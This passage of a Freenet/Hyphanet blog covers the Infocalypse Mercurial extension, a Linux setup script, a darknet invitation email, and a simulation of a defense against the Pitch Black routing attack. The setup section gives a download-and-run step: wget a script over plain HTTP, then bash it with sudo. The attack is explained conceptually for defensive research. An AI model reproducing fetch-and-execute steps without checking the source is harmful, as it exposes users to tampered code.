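    return hashlib.sha1(zero_index_usk.encode('ascii')).hexdigest()[:12]

Whether the real code hashes exactly this string is an implementation detail; the point is that the hash only depends on the zero-index form of the USK, so it stays stable across editions.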

You can get the repository hash for a repository USK using:

hg fn-info

from a directory the repository USK has been fn-pull'd into.

You can get the hashes of repositories that other people have announced via fms with:

hg fn-fmsread --listall

Repository hashes are used in the fms update trust map.

The default private key

When you run fn-setup, it creates a default SSK private key, which it stores in the default_private_key parameter in your .infocalypse/infocalypse.ini file.

You can edit the config file to substitute any valid SSK private key you want.

If you specify an Insert URI without the key part for an infocalypse command, the default private key is filled in for you. i.e.:

hg fn-create --uri USK@/test.R1/0

Inserts the local hg repository into a new USK in Freenet, using the private key in your config file.

USK <--> Directory mappings

The extension's commands 'remember' the insert and request repository USKs they were last run with when run again from the same directory.

This makes it unnecessary to retype cumbersome repository USK values once a repository has been successfully pulled or pushed from a directory.

Aggressive top key searching

fn-pull and fn-push have an --aggressive command line argument which causes them to search harder for the latest request URI.

This can be slow, especially if the USK index is much lower than the latest index in Freenet.

You will need to use it if you're not using FMS update notifications.

[TOC]


Basic Usage

Here are examples of basic commands.

Generating a new private key

You can generate a new private key with:

hg fn-genkey

This has no effect on the stored default private key.

Make sure to change the 'SSK' in the InsertURI to 'USK' when supplying the insert URI on the command line.

Creating a new repository

hg fn-create --uri USK@/test.R1/0

Inserts the local hg repository into a new USK in Freenet, using the private key in your config file. You can use a full insert URI value if you want.

If you see an "update -- Bundle too big to salt!" warning message when you run this command, you should consider running fn-reinsert --level 4.

Pushing to a repository

hg fn-push --uri USK@/test.R1/0

Pushes incremental changes from the local directory into an existing Infocalypse repository.

The <keypart>/test.R1/0 repository must already exist in Freenet. In the example above, the default private key is used. You could have specified a full Insert URI. The URI must end in a number, but the value doesn't matter because fn-push searches for the latest unused index.

You can omit the --uri argument when you run from the same directory the fn-create (or a previous fn-push) was run from.

Pulling from a repository

hg fn-pull --uri <request uri>

pulls from an Infocalypse repository in Freenet into the local repository. Here's an example with a fully specified URI.

You can omit the --uri argument when you run from the same directory a previous fn-pull was successfully run from.

For maximum reliability use the --aggressive argument.

[TOC]


Using FMS to send and receive update notifications

The extension can send and receive repository update notifications via FMS. It is highly recommended that you set up this feature.

The update trust map

There's a trust map in the .infocalypse/infocalypse.ini config file which determines which fms ids can update the index values for which repositories. It is purely local and completely separate from the trust values which appear in the FMS web of trust.

The format is:
<number> = <fms_id>|<usk_hash0>|<usk_hash1>| ... |<usk_hashn>

The number value must be unique, but is ignored.

The fms_id values are the full FMS ids that you are trusting to update the repositories with the listed hashes.

The usk_hash* values are repository hashes.

Here's an example trust map config entry:

# Example .infocalypse snippet
[fmsread_trust_map]
1 = test0@adnT6a9yUSEWe5p8J-O1i8rJCDPqccY~dVvAmtMuC9Q|55833b3e6419
0 = djk@isFiaD04zgAgnrEC5XJt1i4IE7AkNPqhBG5bONi6Yks|be68e8feccdd|5582404a9124
2 = test1@SH1BCHw-47oD9~B56SkijxfE35M9XUvqXLX1aYyZNyA|fab7c8bd2fc3

You must update the trust map to enable index updating for repos other than the one this code lives in (be68e8feccdd). You can edit the config file directly if you want.

However, the easiest way to update the trust map is by using the --trust and --untrust options on fn-fmsread.

For example, to trust falafel@IxVqeqM0LyYdTmYAf5z49SJZUxr7NtQkOqVYG0hvITw to notify you about changes to the repository with repo hash 2220b02cf7ee, type:

hg fn-fmsread --trust --hash 2220b02cf7ee --fmsid falafel@IxVqeqM0LyYdTmYAf5z49SJZUxr7NtQkOqVYG0hvITw

And to stop trusting that FMS id for updates to 2220b02cf7ee, you would type:

hg fn-fmsread --untrust --hash 2220b02cf7ee --fmsid falafel@IxVqeqM0LyYdTmYAf5z49SJZUxr7NtQkOqVYG0hvITw

To show the trust map type:

hg fn-fmsread --showtrust

Reading other people's notifications

hg fn-fmsread -v

Will read update notifications for all the repos in the trust map and locally cache the new latest index values. If you run with -v it prints a message when updates are available which weren't used because the sender(s) weren't in the trust map.

hg fn-fmsread --list

Displays announced repositories from fms ids that appear in the trust map.

hg fn-fmsread --listall

Displays all announced repositories including ones from unknown fms ids.

Pulling an announced repository

You can use the --hash option with fn-pull to pull any repository you see in the fn-fmsread --list or fn-fmsread --listall lists.

For example to pull the latest version of the infocalypse extension code, cd to an empty directory and type:

hg init
hg fn-pull --hash be68e8feccdd --aggressive

Posting your own notifications

hg fn-fmsnotify -v

Posts an update notification for the current repository to fms.

You MUST set the fms_id value in the config file to your fms id for this to work.

Use --dryrun to double check before sending the actual fms message.

Use --announce at least once if you want your USK to show up in the fmsread --listall list.

By default notifications are written to and read from the infocalypse.notify fms group.

The read and write groups can be changed by editing the following variables in the config file:

fmsnotify_group = <group>
fmsread_groups = <group0>[|<group1>|...]

fms can have pretty high latency. Be patient. It may take hours (sometimes a day!) for your notification to appear. Don't send lots of redundant notifications.

[TOC]


Reinserting and 'sponsoring' repositories

hg fn-reinsert

will re-insert the bundles for the repository that was last pulled into the directory.

The exact behavior is determined by the level argument.

level:

  • 1 - re-inserts the top key(s)
  • 2 - re-inserts the top key(s), graph(s) and the most recent update.
  • 3 - re-inserts the top key(s), graph(s) and all keys required to bootstrap the repo.

    This is the default level.

  • 4 - adds redundancy for big (>7Mb) updates.
  • 5 - re-inserts existing redundant big updates.

Levels 1 and 4 require that you have the private key for the repository. For other levels, the top key insert is skipped if you don't have the private key.

DO NOT use fn-reinsert if you're concerned about correlation attacks. The risk is on the order of re-inserting a freesite, but may be worse if you use redundant (i.e. USK@<line noise>/name.R1/0) top keys.

[TOC]


Forking a repository onto a new USK

hg fn-copy --inserturi USK@/name_for_my_copy.R1/0

copies the Infocalypse repository which was fn-pull'd into the local directory onto a new repository USK under your default private key. You can use a full insert URI if you want.

This only requires copying the top key data (a maximum of 2 SSK inserts).

[TOC]


Sharing private keys

It is possible for multiple people to collaborate anonymously over Freenet by sharing the private key to a single Infocalypse repository.

The FreeFAQ is an example of this technique.

Here are some things to keep in mind when sharing private keys.

  • There is no (explicit) key revocation in Freenet

    If you decide to share keys, you should generate a special key on a per-repo basis with fn-genkey. There is no way to revoke a private key once it has been shared. This could be mitigated with an ad-hoc convention, e.g. if I find any file named USK@<public_key>/revoked.txt, I stop using the key.
  • Non-atomic top key inserts

    Occasionally, you might end up overwriting someone else's commits because the FCP insert of the repo top key isn't atomic. I think you should be able to merge and fn-push again to resolve this. You can fn-pull a specific version of the repo by specifying the full URI including the version number with --uri and adding the --nosearch option.
  • All contributors should be in the fn-fmsread trust map

[TOC]


Inserting a freesite

hg fn-putsite --index <n>

inserts a freesite based on the configuration in the freesite.cfg file in the root of the repository.

Use:

hg fn-putsite --createconfig

to create a basic freesite.cfg file that you can modify. Look at the comments in it for an explanation of the supported parameters.

The default freesite.cfg file inserts using the same private key as the repo and a site name of 'default'. Editing the name is highly recommended.

You can use --key CHK@ to insert a test version of the site to a CHK key before writing to the USK.

Limitations:

  • You MUST have fn-pushed the repo at least once in order to insert using the repo's private key. If you haven't fn-push'd you'll see this error: "You don't have the insert URI for this repo. Supply a private key with --key or fn-push the repo."
  • Inserts all files in the site_dir directory named in the freesite.cfg file. Run with --dryrun to make sure that you aren't going to insert stuff you don't want to.
  • You must manually specify the USK edition you want to insert on. You will get a collision error
    if you specify an index that was already inserted.
  • Don't use this for big sites. It should be fine for notes on your project. If you have lots of images
    or big binary files use a tool like jSite instead.
  • Don't modify site files while the fn-putsite is running.

[TOC]


Risks

I don't believe that using this extension is significantly more dangerous than using any other piece of Freenet client code, but here is a list of the risks which come to mind:

  • Freenet is beta software
    The authors of Freenet don't pretend to guarantee that it is free of bugs that could compromise your anonymity or worse.

    While written in Java, Freenet loads native code via JNI (FEC codecs, bigint stuff, wrapper, etc.), which makes it vulnerable to the same kinds of attacks as any other C/C++ code.

  • FMS == anonymous software
    FMS is published anonymously on Freenet and it is written in C++ with dependencies on large libraries which could contain security defects.

    I personally build FMS from source and run it in a chroot jail.

    Somedude, the author of FMS, seems like a reputable guy and has conducted himself as such for more than a year.

  • correlation attacks
    There is a concern that any system which inserts keys that can be predicted ahead of time could allow an attacker with control over many nodes in the network to eventually find the IP of your node.

    Any system which has this property is vulnerable, e.g. fproxy freesite insertion, Freetalk, FMS, FLIP. This extension's optional use of redundant top keys may make it particularly vulnerable. If you are concerned, don't use '.R1' keys.

    Running your node in pure darknet mode with trusted peers may somewhat reduce the risk of correlation attacks.

  • Bugs in my code, Mercurial or Python
    I do my best but no one's perfect.

    There are lots of eyes over the Mercurial and Python source.

[TOC]


Advocacy

Here are some reasons why I think the Infocalypse 2.0 hg extension is better than
pyFreenetHg and
egit-freenet:

  • Incremental

    You only need to insert/retrieve what has actually changed. Changes of up to 32k of compressed deltas can be fetched in as little as one SSK fetch and one CHK fetch.

  • Redundant

    The top level SSK and the CHK with the representation of the repository state are inserted redundantly so there are no 'critical path' keys. Updates of up to ~7 MB are inserted redundantly by cloning the splitfile metadata at the cost of a single 32k CHK insert.

  • Re-insertable

    Anyone can re-insert all repository data except for the top level SSKs with a simple command (hg fn-reinsert). The repository owner can re-insert the top level SSKs as well.

  • Automatic rollups

    Older changes are automatically 'rolled up' into large splitfiles, such that the entire repository can almost always be fetched in 4 CHK fetches or less.

  • Fails explicitly

    REDFLAG DCI

[TOC]


Source Code

The authoritative repository for the extension's code is hosted in Freenet:

hg init
hg fn-fmsread -v
hg fn-pull --aggressive --debug --uri USK@kRM~jJVREwnN2qnA8R0Vt8HmpfRzBZ0j4rHC2cQ-0hw,2xcoQVdQLyqfTpF2DpkdUIbHFCeL4W~2X1phUYymnhM,AQACAAE/infocalypse.hgext.R1/41
hg update

It is also mirrored on bitbucket.org:

hg clone http://bitbucket.org/dkarbott/infocalypse_hgext/

[TOC]


Fixes and version information

  • hg version: c51dc4b0d282

    Fixed abort: <bundle_file> not found! problem on fn-pull when hg-git plugin was loaded.
  • hg version: 0c5ce9e6b3b4

    Fixed intermittent stall when bootstrapping from an empty repo.
  • hg version: 7f39b20500f0

    Fixed bug that kept fn-pull --hash from updating the initial USK index.
  • hg version: 7b10fa400be1

    Added fn-fmsread --trust and --untrust and fn-pull --hash support.


    fn-pull --hash isn't really usable until 7f39b20500f0
  • hg version: ea6efac8e3f6

    Fixed a bug that was causing the berkwood binary 1.3 Mercurial distribution
    (http://mercurial.berkwood.com/binaries/Mercurial-1.3.exe [HTTP Link!]) not to work.

[TOC]


Freenet-only links

This document is meant to be inserted into Freenet.

It contains links (starting with 'CHK@' and 'USK@') to Freenet keys that will only work from within fproxy [HTTP link!].

You can find a reasonably up-to-date version of this document on my freesite:

USK@-bk9znYylSCOEDuSWAvo5m72nUeMxKkDmH3nIqAeI-0,qfu5H3FZsZ-5rfNBY-jQHS5Ke7AT2PtJWd13IrPZjcg,AQACAAE/feral_codewright/15/infocalypse_howto.html

[TOC]


Contact

FMS:
djk@isFiaD04zgAgnrEC5XJt1i4IE7AkNPqhBG5bONi6Yks

I lurk on the freenet and fms boards.

If you really need to you can email me at d kar bott at com cast dot net but I prefer FMS.

freesite:
USK@-bk9znYylSCOEDuSWAvo5m72nUeMxKkDmH3nIqAeI-0,qfu5H3FZsZ-5rfNBY-jQHS5Ke7AT2PtJWd13IrPZjcg,AQACAAE/feral_codewright/15/

[TOC]


Install and setup infocalypse on GNU/Linux (script)

Update (2015-11-27): The script works again with newer Freenet versions.

Update 2024: Infocalypse is still recovering from Python 3 breakage. Most of it works again, but there may be rough edges left. Contributions to fix these are very welcome: hg.sr.ht/~arnebab/infocalypse or github.com/hyphanet/infocalypse.

Install and setup infocalypse on GNU/Linux:

setup_infocalypse_on_linux.sh

Just download and run1 it via

wget http://draketo.de/files/setup_infocalypse_on_linux.sh_.txt
bash setup_infocalypse*

This script needs a running freenet node to work! → Install Freenet

In-Freenet-link: CHK@rtJd8ThxJ~usEFOaWAvwXbHuPC6L1zOFWtKxlhUPfR8,21XedKU8YbKPGsYWu9szjY7hChX852zmFAYuvyihOd0,AAMC--8/setup_infocalypse_on_linux.sh

The script allows you to get and set up the infocalypse extension with a few keystrokes, so you can instantly use the Mercurial DVCS for decentralized, anonymous code-sharing over Freenet.

« Real Life Infocalypse »
DVCS in the Darknet. The decentralized p2p code repository (using Infocalypse)

This gives you code hosting like a minimal version of BitBucket, Gitorious or GitHub, but without the central control. Additionally, the Sone plugin for Freenet supplies anonymous communication, and the site extension allows creating static sites with information about the repo, recent commits and such, without needing a dedicated hoster.

Basic Usage

Clone a repo into freenet with a new key:

hg clone localrepo USK@/repo

(Write down the insert key and request key after the upload! localrepo is an existing Mercurial repository.)

Clone a repo into or from freenet (respective key known):

hg clone localrepo freenet://USK@<insert key>/repo.R1/0
hg clone freenet://USK@<request key>/repo.R1/0 [localpath]

Push or pull new changes:

hg push freenet://USK@<insert key>/repo.R1/0
hg pull freenet://USK@<request key>/repo.R1/0

For convenient copy-pasting of freenet keys, you can omit the “freenet://” here, or use freenet:USK@… instead.

Also, as shown in the first example, you can let infocalypse generate a new key for your repo:

hg clone localrepo USK@/repo

Mind the “USK@/” (the slash right after the @ means a missing key). Also note the missing .R1/0 after the repo name and the missing freenet://. Being able to omit those on repository creation is just a convenience feature, but one which helps me a lot.

You can also add the keys to the <repo>/.hg/hgrc:

[paths]
example = freenet://USK@<request key>/repo.R1/0
example-push = freenet://USK@<insert key>/repo.R1/0
# here you need the freenet:// !

then you can simply use

hg push example-push

and

hg pull example

Contribute

This script is just a quick sketch; feel free to improve it and upload improved versions (for example with support for more GNU/Linux distros). If you experience any problems, please contact me! (i.e. write a comment)

If you want to contribute more efficiently to this script, get the repo via

hg clone freenet://USK@73my4fc2CLU3cSfntCYDFYt65R4RDmow3IT5~gTAWFk,Fg9EAv-Hut~9NCJKtGaGAGpsn1PjA0oQWTpWf7b1ZK4,AQACAAE/setup_infocalypse/1 

Then hack on it, commit and upload it again via

hg clone setup_infocalypse freenet://USK@/setup_infocalypse

Finally share the request URI you got.

Alternate repo: http://draketo.de/proj/setup_infocalypse


  1. On systems based on Debian or Gentoo - including Ubuntu and many others - this script will install all needed software except for Freenet itself. You will have to give your sudo password in the process. Since the script is just a text file with a set of commands, you can simply read it to make sure that it won't do anything evil with those sudo rights.

Attachment  Size
setup_infocalypse_on_linux.sh.txt  2.39 KB
setup_infocalypse_on_linux.sh_1.txt  2.49 KB
setup_infocalypse_on_linux.sh_.txt  2.75 KB

Let us talk over Hyphanet, so I can speak freely again

I sent this email to many of my friends to regain confidential private communication. If you want to do the same, feel free to reuse the text-version (be sure to replace the noderef textblock with your own noderef from http://127.0.0.1:8888/friends/myref.txt). This text is also available in Hyphanet.

About 10% of my friends joined - which is enough to build the darknet and makes it possible for me to speak freely again.

First: The Essence of this text:

I’ve been censoring my emails for years. Not just what I write, but also whom and when.

Hyphanet allows me to write invisible messages to my friends. Those are messages I do not need to censor. They give me freedom. Surveillance can show that we could write, but not whether, when or what we actually write. If Hyphanet is used just for that, it needs very few resources.

This is how to connect:

  1. Download and install Hyphanet from https://freenetproject.org or https://www.hyphanet.org
  2. in the automatically opened setup wizard select “only friends”
  3. Copy the textblock1 you got with my email and paste it into the textfield on http://127.0.0.1:8888/addfriend/
  4. Then just send me what Hyphanet shows on the page http://127.0.0.1:8888/friends/myref.txt (attach it to an email or just copy it into the email)

As soon as I add you, too, we are connected. We can then write messages via the friends page (click my name):

Hi,

I’ve been self-censoring what I write by email for years. But over the past year, with ever more details of surveillance being proven as fact and not just conspiracy theory, that became more serious: I no longer see email as safe, and with that, email is lost for me as a medium for personal communication. If I want to talk privately, I don’t use email.

You might have noticed that since then I’ve been writing fewer and fewer non-public emails.

This started impeding my life when the critical law reporter at groklaw stopped publishing, because the owner did not consider sending information via email safe anymore. Now I self-censor what I write, to whom I write, and when I write.

There is now no shield from forced exposure.2

But I have one haven left: Instead of writing private stuff by email, I’m communicating more and more via Hyphanet, especially with darknet contacts: People I know personally. And I’d like to do that with you, too. The reason is that Hyphanet Darknet messages hide even the information that we have a conversation at all:

I can finally send completely invisible messages.

This gives me the confidentiality back which allows talking freely. Talking without self-censoring every word I write.

And I would like to have that freedom when talking to you online. So I would be very happy if you’d install Hyphanet and connect to me over Darknet.

Install Hyphanet

To install Hyphanet, just go to https://freenetproject.org and click the green install-button

Then click through the installer as usual. After that your browser should open and show the Hyphanet Setup Wizard.

The Wizard

In the wizard, choose "Connect only to friends: (high security)".

For the following questions, just use the default or the option called "normal".

You can always revisit the wizard at http://127.0.0.1:8888/wizard/

Connect with me

Now go to the page “connect to a friend”: http://127.0.0.1:8888/addfriend/

There simply paste the following into the empty text field below the blurb of explanation (note: for this article I replaced the identifying info with X-es. Use your own from http://127.0.0.1:8888/friends/myref.txt):

identity=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
lastGoodVersion==XXXXXXXXXXXXXXXXXXXXXXX  
location==XXXXXXXXXXXXXXXXXXXXXXXX  
myName=XXXXXXX  
opennet=XXXXX  
sigP256=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
version==XXXXXXXXXXXXXXXXXXXXXXX  
ark.number=XXXX  
ark.pubURI=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
auth.negTypes=XX  
ecdsa.P256.pub=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
physical.udp==XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
End

Just put my name in the description above the “Add” button and leave everything else at default.

Then send me an email3 with the text you find at the URL http://127.0.0.1:8888/friends/myref.txt

Once I copy that text into my own addfriends page, our computers will connect over Hyphanet.

(no need to babysit Hyphanet for this: simply let it run when you're online, and as soon as I add you, our computers will connect over Hyphanet. Please give me a few days: With the PhD and the two little ones I'm often no longer able to answer email daily, but I do see them.)

And that’s it. We’re connected. In the rest of this mail, I’ll describe what you can do with Hyphanet.

Welcome to Hyphanet, where no one can watch you read!

I hope we will connect soon!

Best wishes, Arne

Using Hyphanet

Talk with me over Hyphanet

Once we are connected, you can send me confidential messages by going on the Friends page and clicking my name.

Friends-page: http://127.0.0.1:8888/friends/

That page lists all the people you are connected to. You can also tick the checkbox for multiple people and then use the drop-down list “– Select Action –” and select “Send N2NTM to selected peers”. An N2NTM is a “node to node text message”.

You can see all messages you received on the messages page:

Messages-page: http://127.0.0.1:8888/alerts/

These messages are invisible to the outside.

Send me files over Hyphanet

If you want to send me bigger files, you can upload them from the upload page:

Upload-page: http://127.0.0.1:8888/insertfile/

When they finish uploading, just go to the list of Uploads, select the files you want to share with me and click the button “Recommend files to friends”. Then select my name and click the “Recommend” button at the bottom.

List of Uploads: http://127.0.0.1:8888/uploads/

You can also do the same for downloads, so it’s easy to pass on files.

The files you upload are stored encrypted in Hyphanet and can only be found by people who have the link to the file. Like a filehoster, but encrypted and completely decentralized.

Advanced Hyphanet Usage

What I show here aren’t all the features of Hyphanet. Not by a long shot. But it’s enough to provide confidential communication between friends:

I can talk to you without self-censoring every single thought.

If you want to explore Hyphanet further, there are three central features:

  • Bookmarks to have hidden websites which inform you when they are updated.
  • Your own website in Hyphanet.
  • Anonymous Discussions with a Web of Trust to prevent spam.

Bookmarks

Bookmarks are easy. Just go to the main freenet page and click the [Edit] link above the bookmarks. It gets you to the bookmarks editor for changing and sharing bookmarks.

Bookmark-editor: http://127.0.0.1:8888/bookmarkEditor/

Websites in Hyphanet

Websites in Hyphanet are also simple. To get a basic website, just install the ShareWiki plugin, enter text, click publish, and once the upload has finished, send the URL to your friends by clicking “share” in the list of uploads. With this you can publish in Hyphanet: Your friends will know that it's your site, but no one else will.

Configure Plugins: http://127.0.0.1:8888/plugins/
The key for ShareWiki to add as “Plugin from Hyphanet”: CHK@aCQTjPQI3uGsahMiTuddwJ51UJypA5Mqg4y0tf1VqXQ,eEkO3uge6IJ1QcrT5KGlJ1R6kEcMhQV4rXfv6NzoL5o,AAMC--8/ShareWiki-b17.jar

(note: ignore the search box on the main page. It’s broken)

Anonymous Discussions

Anonymous Discussions are somewhat different from the other features, because they require the Web of Trust, and that is very heavyweight.

If you want to keep the resource consumption of Hyphanet low, avoid the anonymous discussion platforms.

You will see people recommend it - even me. It is cool, but you should only enable it if you have a computer which is always running and for which it does not matter when it runs at high load.

If you only want confidential communication with friends, just avoid the Web of Trust for now. If you stick to the basic features (darknet messages, uploads, downloads, bookmarks), Hyphanet will require few resources and little bandwidth.

For a low-spec computer or a laptop, avoid the Web of Trust and anonymous discussions: They are really cool, but still require lots of resources.

If you value truly anonymous discussions higher than keeping the load on your computer low, or if you have a computer which is always running, have a look at the Hyphanet Social Networking guide. It shows you how to set up and use the social features of Hyphanet.

Freenet Social Networking Guide: http://freesocial.draketo.de

Have fun in Hyphanet!

Troubleshooting

High resource usage

If Hyphanet makes your fans run at full speed and your disk crackle, you can fix that with three steps:

Technical details


  1. Censored version of my textblock (you’ll get an uncensored version by email) identity=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    lastGoodVersion==XXXXXXXXXXXXXXXXXXXXXXX
    location==XXXXXXXXXXXXXXXXXXXXXXXX
    myName=XXXXXXX
    opennet=XXXXX
    sigP256=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    version==XXXXXXXXXXXXXXXXXXXXXXX
    ark.number=XXXX
    ark.pubURI=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    auth.negTypes=XX
    ecdsa.P256.pub=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    physical.udp==XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    End 

  2. Groklaw: Forced exposure 

  3. Naturally it would be better to send the freenet addfriend text via encrypted emails with a full chain of trusted signatures. But for the basic goal of confidential communication that is not necessary. We can check sometime later whether the text we exchanged was changed, so if someone wants to eavesdrop, we can detect that. And we would have proof, which would make for the next great story for political magazines like Panorama - which would help a lot in fighting surveillance in the long term (so it's unlikely that people who want surveillance will dare to do that). Example: “NSA targets privacy conscious” in German public media documentation

Attachment  Size
connect-over-freenet-01.txt  11.32 KB

Lots of site uploads into freenet

I just finished lots of new uploads of sites into freenet - with the new freesitemgr (which actually uploads quickly when WoT is disabled; check today's IRC logs tomorrow to get background on that). You can get the new freesitemgr from github.com/ArneBab/lib-pyfreenet-staging or via infocalypse:

hg clone freenet://USK@kDVhRYKItV8UBLEiiEC8R9O8LdXYNOkPYmLct9oT9dM%2CdcEYugEmpW6lb9fe4UzrJ1PgyWfe0Qto2GCdEgg-OgE%2CAQACAAE/pyfreenet.R1/14 

The sites are also available via my freenet inproxy:

freenet-team - an introduction to most of the freenet hackers I know.

mathmltest - example of mathml in freenet.

winterface-deadlines - deadlines for the Winterface GSoC project

freenet-funding - the freenet fundraising plan, still lacking good design and crisp presentation slides or a video

freenet-meltdown - on the recent massive performance degradation which lasted a few months and ended with the link length fix.

fix-link-length - background on the link-length fix which made freenet actually do small world routing again instead of random routing (into which it had degraded, partially due to local requests, partially due to having so many peers per node that random routing actually worked for the current network size, so the pressure from routing success to go back to small world routing was too weak compared to the pressure from local requests to randomize the connections).

download-web-site - how to download a single page from a website - for example to mirror it into freenet. Hint: For all the sites on draketo.de or 1w6.org you are allowed to do so freely (licensed under GPL).

guiledocs - the online documentation for GNU Guile with a focus on Scheme (using Guile): A powerful lisp-like language with multiple implementations.

decorrespondent-metadata - an experiment in how much information one can glean about your life from just one week of metadata, in Dutch.

netzpolitiz-metadaten - the same article translated to German. License: cc by-nc-sa

Adventures of a Pythonista in Schemeland - the adventures of a Pythonista in Schemeland: A deep understanding of Scheme for Python users. I learned to love Scheme with this. BSD license.

programming-languages - The Programming languages lecture. License: cc by-nc-sa

tao of programming - "When you have learned to snatch the error code from the trap frame, it will be time for you to leave."

Mitigate the Pitch Black attack (the simulation works)

I fixed a small bug in the simulator of thesnark. With that, the simulator shows that the defense against the Pitch Black Attack works: A small number of attackers can no longer kill parts of the keyspace and can also no longer make certain parts of the keyspace inaccessible.

Attackers can still limit the convergence of the network towards a reproduction of the small world network, but since we know that Opennet works quite well with 30% backoff, this limited convergence should suffice for efficient routing.

peer distances under attack

I also identified two possible ways to make the algorithm more efficient.

The fix does not need to know the size of the network. The only global information it needs is routing to random locations.

In this mail I first describe the simulator and the Pitch Black Attack. Afterwards I describe the fix. The fix was originally proposed by Oskar Sandberg. He did all the hard work; I just describe it here.

Graphics

Peer Distances - Location histogram

(because that’s what most people really want ☺)

These show that the fix prevents complete fracturing of the keyspace: It recreates the short connections.

The simulator

Most of the simulation is the work of Michael Grube. I just fixed a small bug.

  • Michaels Repo: http://github.com/mgrube/pbsim
  • My Repo: http://github.com/ArneBab/pbsim

The simulation starts with a random network and then optimizes it, either with clean swapping or under attack, without and with the different countermeasures.

To run the simulation, run

./testfixpitchblack.py

You need pylab and networkx (links are in README.md).

The Pitch Black Attack (the problem)

Optimizing the network with swapping works pretty well without attacks (within the mathematical limits1) — as shown in the simulation ("clean swapping network"). But this can currently be broken easily, even by a single attacker, using the Pitch Black Attack.2

Swapping exchanges keys and implicitly trusts randomly selected nodes. Two nodes compare their peers, and if they determine that exchanging their locations improves the link length distribution to their respective group of peers, they swap the locations. Node A now has the former location of node B and node B has the former location of node A.
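
As a rough illustration of that decision (a sketch of my reading, not the exact criterion used by Freenet's swapping code), one can take “improves the link length distribution” to mean “the combined distance of both nodes to their peers shrinks when the locations are exchanged”:

# Illustrative Python sketch only; the function names are made up for this example.
def circ_dist(a, b):
    # distance on the circular keyspace [0..1)
    d = abs(a - b)
    return min(d, 1 - d)

def link_cost(location, peer_locations):
    # product of the distances to all peers; smaller means better clustering
    cost = 1.0
    for peer in peer_locations:
        cost *= circ_dist(location, peer)
    return cost

def swap_improves(loc_a, peers_a, loc_b, peers_b):
    before = link_cost(loc_a, peers_a) * link_cost(loc_b, peers_b)
    after = link_cost(loc_b, peers_a) * link_cost(loc_a, peers_b)
    return after < before

In this reading, node A and node B exchange locations whenever swap_improves returns True. The attack described below does not depend on the exact formula: it only exploits the implicit trust in the locations that get exchanged.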

Normally that’s no problem: The probability that this trust is violated is just the proportion of attackers in the network. So some swaps will go wrong, but this will happen only rarely.

There is one lasting effect, however: If node B always hands out the same location when swapping, this location will stay in the network indefinitely and the former location of node A will be lost. This is slow (only one location can be killed per swap), but highly effective.

Using the Pitch Black Attack, attackers can remove selected locations from the network (which allows for censorship by making selected files with known keys inaccessible, because nodes with their content change to locations which won’t be searched for this content).

The fix for this has been pending since 2008 because “We have solutions for this but they are still being tested.” (https://freenetproject.org/about.html#papers). I consider this testing done with this email. The fix works, as described in the following.

Approach

To fix the Pitch Black Attack nodes route to a random location and check the distance of the closest node they can reach. If this distance is much larger than expected, they consider the network to be under attack and switch to this location to fill the gap they found.

If detection and filling of gaps is faster than creation of gaps by the Pitch Black Attack, this reduces the Pitch Black Attack from a death stroke to a nuisance.

Requirements

  1. The algorithm must be stable for (a) a random network and (b) a network with a cluster of small-world structured nodes embedded in a random network. It must not mistake (a) or (b) for attacked networks, otherwise swapping will not be able to turn a random network into a small-world network.

  2. In case of an attack, nodes must switch to positions inside the created gaps to fill them.

  3. When switching locations, content must be preserved close to the old location.

Information used

The simulated algorithm only uses the estimated number of peers (also known as outdegree), the distance to direct peers and actual routing. It does not need the size of the network.

The number of peers is used to calculate the expected distance to a location in a randomly structured network. More exactly: The mean distance plus two standard deviations (97.5% of random routes will find a shorter distance than this). Let’s call this expected random distance range d_er. As far as I can reconstruct it, this distance was calculated by Oskar using statistics. I just use brute force, as shown in https://github.com/ArneBab/pbsim/blob/master/bruteforcemindist.py

This is the magic number 0.037. If you repeatedly choose a set of six random locations in the circular keyspace [0..1) and stop as soon as the closest of these locations isn’t closer to the target than on the previous try, and you re-run this experiment many times, then 95% of the results will be closer than 0.037. It’s the 95% limit of the distance to a target in a random network with outdegree 6.

The basic algorithm

Before starting to swap, a freenet node first selects a random location. Let’s call it l. Then it routes towards this location and notes the distance of the node closest to this location. Let’s call it d.

Now it calculates the mean distance to its direct peers. Let’s call this d_mean.

If the distance d minus the mean distance to the peers d_mean is larger than the expected random distance range d_er, the node assumes that the random location l is within a gap. Instead of starting a swap request, it switches to this tested location l.

if (d - d_mean) > d_er:
    switch to l
else:
    initiate swap

d - d_mean compares the routing result with the distribution of direct peers. If the gap is bigger than the mean distance to the peers, it might be a real gap, judged purely from local information.

